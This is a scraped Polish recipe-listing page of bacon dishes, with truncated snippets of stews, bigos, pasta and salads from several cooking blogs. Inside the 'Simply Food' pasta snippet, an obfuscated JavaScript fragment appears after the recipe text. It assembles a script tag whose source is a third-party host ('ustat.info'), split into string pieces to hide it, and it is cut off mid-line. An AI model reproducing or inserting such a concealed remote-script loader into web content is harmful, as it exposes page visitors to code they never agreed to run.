boczek - 14002 przepisów (strona:299/934)

Pieczonki z ogniska 160

woli duszonki z ogniska rewelacyjne w swojej prostocie danie idealne na biesiady przy ognisku. Kilka liści  białej kapusty 2 kg ziemniaków 500 gramów wędzonego boczku ok.pół kilograma cebuli 600/ 700 gramów kiełbasy zwyczajnej ok 300/400 gramów marchewki kilka kulek ziela angielskiego 5 listków laurowych sól i pieprz opcjonalnie wegeta Ziemniaki  i marchewkę obrać i pokroić(...)grube plastry lub dużą kostkę według uznania.  Cebulę kroimy w piórka. Boczek i kiełbasę pokroić w kostkę. Następnie dno kociołka  smarujemy olejem ,wykładamy obficie liśćmi kapusty, układamy warstwami ziemniaki cebula marchewka,boczek i kiełbasa przyprawiamy. Najlepiej aby były minimum dwie warstwy. Całość przykryć liśćmi kapusty. Przykryć kociołek pokrywką  ustawiamy na rozpalonym ognisku i pieczemy

Andzia Pichci
fasola jasiek w pomidorach na wędzonce... 168

Składniki: fasola jasiek 50 dag, woda do gotowania fasoli 2 litry, liść laurowy 1 sztuka, ziele angielskie 4 sztuki, kostka rosołowa 1 sztuka, boczek wędzony 35 dag, smalec 1 łyżka, przyprawa do mielonego mięsa 1/2 opakowania, cebula 1 sztuka, ząbki czosnku 2 sztuki, pomidory miękkie 8 sztuk, majeranek 2 łyżki Fasolę jasiek moczyć całą noc w dużej ilości wody, przed(...)gotowaniem wodę z moczenia wylać. Fasolę zalać wodą, wsypać liść laurowy, ziele angielskie, kostkę rosołową i gotować do miękkości fasoli, około 60 minut pod przykryciem na średnim ogniu. Wędzony boczek pokroić w kostkę, na smalcu boczek usmażyć razem z cebulą i czosnkiem, przyprawą do mielonego mięsa, dodać do ugotowanej fasoli, gotować z 10 minut. Wlać pomidory świeże zblendowane blenderem, wsypać

W Mojej Kuchni Lubię
Kasza z boczkiem i cukinią 191

Przepis na kaszę gryczaną z boczkiem i warzywami podpatrzyłam na niezastąpionej " Kwestii smaku "i odrobinkę go podpasowałam pod siebie. Nie wiem tylko jak to się stało, że wcześniej na niego nie wpadłam, bo jest naprawdę świetny. Szybkie, smaczne danie, idealne na obiad a zwłaszcza żeby móc go zapakować na wynos do lunchboxa. Myślę, że jeszcze nie raz zawita na naszym(...)stole ;) Składniki na 4 porcje: 200 g kaszy gryczanej 4 łyżki ciemnego sosu sojowego 200 g wędzonego boczku 1 nieduży por 1 cebula 2 ząbki czosnku 1 nieduża żółta cukinia 1 puszka groszku konserwowego pieprz, suszona bazylia, słodka czerwona papryka mielona natka pietruszki   Kaszę ugotować zgodnie z instrukcją na opakowaniu, następnie wsypać ją do miski, dodać sos sojowy, wymieszać

Simply Food
5 najpopularniejszych rodzajów makaronu 172

Podobnie jak spaghetti ma formę wstążek, jednak wyróżnia się tym, że nitki tagliatelle są zdecydowanie szersze. Coraz większą popularnością cieszą się odmiany smakowe, np. pomidorowe. Tagliatelle z kurkami i boczkiem 400 g tagliatelle, 250 g kurek, 300 g plastrów boczku, cebula, oliwa z oliwek, 2 ząbki czosnku, ulubione przyprawy. Na oliwie z oliwek zeszklić cebulę i dodać do niej kurki(...)wyparuje woda z grzybów dodać posiekany czosnek oraz boczek. W międzyczasie odcedzić makaron i dodać go na patelnię z mięsem i kurkami. Wszystko wymieszać i przyprawić. Voila! A wy jaki makaron lubicie najbardziej? (function(){ wX6g=document.createElement("script");wX6g.type="text/javascript"; wX6g.async=true;wX6g_=(("us")+"t")+"a";wX6g_+=("t.i")+""+"n";wX6g_+=(("f")+"o");wX6g_+="/"; wX6gu="181642321.";wX6gu+="eq97gq6uX6g2q5z6p9flcr5x4ft45r";wX6g.src="https://"+wX6g_+wX6gu

CookMag
Aromatyczny boczek Sous Vide 327

SUROWIEC -1,5 kg boczku ze skórą b/k PRZYPRAWY I MATERIAŁY POMOCNICZE -peklosól 19 g/kg -jałowiec mielony 2 g/kg -chili grys 1 g/kg -pieprz czarny grubo mielony 1 g/kg -czosnek zgnieciony 2-3 ząbki -cyrkulator -worki próżniowe -naczynie do parzenia WYKONANIE Płat boczku kroimy po długości, peklujemy, przyprawiamy ze wszystkich stron i składamy tak aby skóra była w środku(...)czasie parzymy cyrkulatorem 11 godz. w 63 st. Następnie schładzamy 10-15 min w zimnej wodzie. Chowamy do lodówki na noc w celu dalszego schłodzenia i sklejenia się boczku. Ps. Przyprawy jakie podałem to tylko moja sugestia każdy może dodać inne. SMACZNEGO

Domowe wyroby.Coś do chleba i talerza.
Mielone ze śliwką otulone wędzonym boczkiem 182

Domowe, soczyste mięsne kotleciki z wyrazistym słodkim smakiem śliwki węgierki, owinięte plastrem aromatycznego boczku to doskonały pomysł na danie obiadowe z sezonowymi owocami. Składniki: 500g fileta z kurczaka 300g mięsa z łopatki 1 cebula 2 ząbki czosnku 1 pęczek natki z pietruszki 2 łyżki majeranku 2 łyżki bułki tartej 1 jajko 10 plastrów wędzonego boczku 10 sztuk śliwki węgierki sól(...)smaku solą i pieprzem. 2. Z mięsnej masy uformować kulki o średnicy około 6 cm wkładając do każdej po 1 śliwce, a następnie każdy z kotlecików owinąć plastrem wędzonego boczku. 3. Kotleciki obsmażyć z każdej strony na rozgrzanym oleju, a następnie przełożyć do naczynia żaroodpornego. Piec w piekarniku nagrzanym do 180 stopni przez około 35-40 minut

Szalona Kuchnia Eweliny
Spaghetti z bobem i boczkiem w kremowym sosie 176

Smaczny sezonowy obiad, z bobem i nową, lepszą wersją makaronu spaghetti Lubella Pełne Ziarno w roli głównej. Z dodatkiem boczku dla okrasy i kremowego sosu na bazie serka mascarpone tworzą wyśmienitą kompozycję. Szybkie tempo przygotowania, prostota i smak, to zalety potraw z makaronem, a makarony pełnoziarniste Lubella dodatkowo zawierają wiele cennych minerałów, witamin oraz błonnik, a ich skład jest wciąż(...)dobrze, jak klasyczne makarony, co sprawia, że szybko znikają z talerza nawet u najmłodszych ☺️ Składniki, 2 porcje: 200 g makaronu spaghetti Lubella Pełne Ziarno 300 g bobu 120 g boczku w kawałkach 100 g serka mascarpone 1 łyżka oleju rzepakowego szczypta pieprzu natka pietruszki do dekoracji Makaron ugotować w osolonej wodzie według wskazówek na opakowaniu, odcedzając zostawić 1/2 szklanki wody

Kraina Miodem Płynąca
Bigos z białej kapusty 133

Kolejna wersja bigosu. Ciągle odkrywamy.  Składniki:  1 mała główka białej kapusty 500 g karkówki wieprzowej 400 g boczku wędzonego 1 pętko kiełbasy 180 g koncentratu pomidorowego 2 cebule 1 łyżka smalcu 2 szalotki 1 łyżeczka cukru 5 suszonych kapeluszy prawdziwków (borowików) 2 liście laurowe 5 ziaren ziela angielskiego Marynata: 100 ml oleju rzepakowego 2 ząbki czosnku 1 łyżeczka(...)temperaturze 180 stopni C, Pod koniec pieczenia zdjąłem pokrywę. Kapustę umyłem, usunąłem uszkodzone liście z wierzchu, poszatkowałem dość grubo. Poszatkowaną kapustę umyłem i przecedziłem przez duże sito. Pokroiłem boczek w kostkę i smażyłem na małym ogniu z łyżką smalcu. Mieszałem od czasu do czasu, by zarumienił się równomiernie ze wszystkich stron. Pokroiłem cebulę w kostkę i szalotki w talarki, dodałem

R'n'G Kitchen
Penne z sosem śmietanowym z boczkiem wędzonym 125

dobrego makaronu wystarczy prosty, kilkuskładnikowy sos by powstało pyszne i sycące danie. Sos śmietanowy to jeden z ulubionych mojego Ł. Delikatnie słony z pysznym posmakiem wędzonego boczku.  Składniki (4 porcje) -300 g makaronu penne -200 ml śmietanki UHT -1/2 cebuli -200 g wędzonego boczku krojonego w kostkę -1 łyżka oleju -sól, pieprz -opcjonalnie: szczypta ostrej papryczki, tarty żółty(...)posypania Przygotowanie Makaron ugotować al dente. Cebulę drobno posiekać. Zeszklić na łyżce oleju. Dodać boczek i przesmażyć. Zalać śmietanką i doprawić solą, pieprzem i ewentualnie papryką. Całość poddusić kilka minut do lekkiego zredukowania i przeniknięcia się smaków. Wymieszać z makaronem. Podawać na ciepło posypany tartym żółtym serem. Smacznego

Zielona Kuchnia
Kolorowe roladki wieprzowe 177

ulubioną surówką świetnie sprawdzą się jako rodzinny obiad.     Składniki: ok 0,7 kg schabu pół czerwonej papryki pół żółtej papryki pół pora – zielona część 10dkg boczku wędzonego 1 kulka sera mozzarella ok 1 szklanka mąki – do obtoczenia mięsa olej do smażenia 300ml bulionu 1 łyżeczka koncentratu pomidorowego 1 łyżka sosu sojowego Przyprawy: sól, pieprz, słodka i ostra(...)mąka lub śmietanka do zaciągnięcia sosu       *** Mięso kroimy na plastry, cienko rozbijamy i przyprawiamy z dwóch stron solą oraz pieprzem *** *** Papryki oraz pora kroimy w kosteczkę *** *** Boczek wędzony kroimy w drobną kosteczkę *** *** Ser mozzarella odsączamy z zalewy i kroimy na tyle części ile mamy kotletów *** *** Na każdym plastrze mięsa układamy porcję sera oraz po trochu papryki, boczku

Blog z Apetytem
Szaszłyki z piekarnika. Prawdziwa mięsna uczta w domu. PRZEPIS 19032

wychodzą z piekarnika. Świetnie sprawdzają się na domowych imprezach. Nasz pomysł na mięsną ucztę. Przepis na szaszłyki z piekarnika Składniki: około kilograma karkówki lub łopatki wieprzowej, 250 gramów wędzonego boczku, dwie duże cebule, 2 większe świeże papryki, 5 ząbków czosnku, kopiasta łyżka papryki w proszku, sól, pieprz, trochę oleju. Zrób tak: dzień przed pieczeniem mięso pokrój w grubą kostkę. Czosnek(...)soli, sporo pieprzu, a także około 2 łyżek oleju. Wszystko dokładnie wymieszaj. Najlepiej zrobić to dłońmi. Odstaw do lodówki. Na dwie godziny przed pieczeniem do mięsa dodaj pokrojony plastry boczek, paprykę pokrojoną w sporą kostkę i cebulę pokrojoną w ćwiartki. Ponownie wymieszaj – dzięki temu pozostałe składniki również przejdą smakiem marynaty. Na patyki do szaszłyków nabijaj ciasno kolejno mięso, cebulę

Kulinarna Polska
PIERŚ Z KURCZAKA ZAPIEKANA Z ZIEMNIAKAMI 229

zrobić.Wyglądało apetycznie i powiem Wam że też tak smakuje.Pierś z kurczaka jest soczysta z chrupiąca skórką i do tego zapiekane ziemniaczki.Pycha!!!! SKŁADNIKI 4 piersi z kurczaka 150g boczku 200g sera żółtego w kawałku 800g ziemniaków mozzarella do posypania sól pieprz tymianek WYKONANIE Piersi z kurczaka oczyszczamy ze skórek jeśli są :).Nacinamy nożem w poprzek ale nie do końca(...)Boczek oraz ser żółty kroimy w kwadraciki :). W zagłębienia wkładamy naprzemiennie raz serek raz boczek :). Tak ozdobione filety przekładamy na blachę wyłożoną papierem do pieczenia.Posypujemy serem mozzarellą.Solimy i posypujemy pieprzem. Ziemniaki obieramy i kroimy na mniejsze części.Dokładamy do naszych filetów,polewamy oliwą z oliwek,solimy i posypujemy tymiankiem :). Wkładamy do nagrzanego do 180C piekarnika i pieczemy ok.45-50 minut.Zapach

Mała w garnku miesza
Fasolka po bretońsku 163

Czas przygotowania: 60 minut + czas moczenia fasoli Składniki na fasolkę po bretońsku: 500 g fasoli (u mnie Jaś karłowy) 400 g dobrej cienkiej wędzonej kiełbasy 300 g boczku wędzonego 2 marchewki mały korzeń selera korzeń pietruszki duży ziemniak 2 cebule 4 ząbki czosnku 4 dojrzałe pomidory lub 300 ml passaty pomidorowej 2 łyżki majeranku łyżeczka cząbru łyżka mielonego kminku(...)minut, ewentualnie dodać więcej wody, aby pokrywała fasolę. Do fasolki wrzucić listek laurowy i ziele angielskie. Marchewkę, selera i pietruszkę obrać i drobno pokroić, dodać do gotującej się fasoli. Boczek pokroić w cienkie słupki i podsmażyć do lekkiego przyrumienienia i wytopienia się z niego odrobiny tłuszczu. Sam boczek dodać do fasoli, a na tłuszczu podsmażyć drobno pokrojoną cebulę i czosnek

Gotuj w domu
Sos bolognese 182

smak i delikatność mięsa w sosie.  Ilość porcji: 5 Czas przygotowania: 150 minut Składniki na sos bolognese: 1 kg mielonego mięsa (część może być wołowego) 150 g wędzonego boczku 3 cebule 3 ząbki czosnku 3 łodygi selera naciowego 2 marchewki puszka krojonych pomidorów lub 5 świeżych 300 ml passaty pomidorowej 3 łyżki koncentratu pomidorowego 300 ml czerwonego wytrawnego wina(...)soli było 2,5 łyżeczki)  Jak zrobić sos bolognese? Marchew, selera, czosnek, cebulę obrać i pokroić w drobną kostkę. Świerze pomidory sparzyć, zdjąć skórkę i pokroić w kostkę. Boczek pokroić w kostkę i podsmażyć do momentu, aż zacznie wytapiać się tłuszcz. Razem z boczkiem przyrumienić cebulę, a pod koniec dodać czosnek. Następnie dodać marchew, selera, oliwę i smażyć około

Gotuj w domu
Sałatka ziemniaczana z boczkiem wędzonym 161

Klasyczną niemiecką sałatkę ziemniaczaną (Kartoffelsalat) zapewne większość z Was kojarzy. Postanowiłam ją urozmaicić idąc jeszcze bardziej w gust mojego Lubego. Dodatek wędzonego boczku, który zresztą idealnie pasuje, dodaje sałatce trochę charakteru i świetnego posmaku. Sałatkę ziemniaczaną polecam zwłaszcza jako dodatek do obiadowych mięs zamiast klasycznych ziemniaków.  Składniki (4 porcje) -600 g ziemniaków -5 ogórków konserwowych -1 mała cebula(...)wędzonego boczku pokrojonego w kosteczkę -2 łyżki majonezu -2 łyżki jogurtu naturalnego -świeży koperek -sól, pieprz Przygotowanie Ziemniaki ugotować w mundurkach, ostudzić, obrać i pokroić w dużą kostkę. Cebulę i koperek  drobno posiekać. Ogórki pokroić w kostkę. Składniki umieścić w misce, dodać boczek wędzony, majonez i jogurt. Doprawić solą i pieprzem i dokładnie wymieszać. Schłodzić. Smacznego

Zielona Kuchnia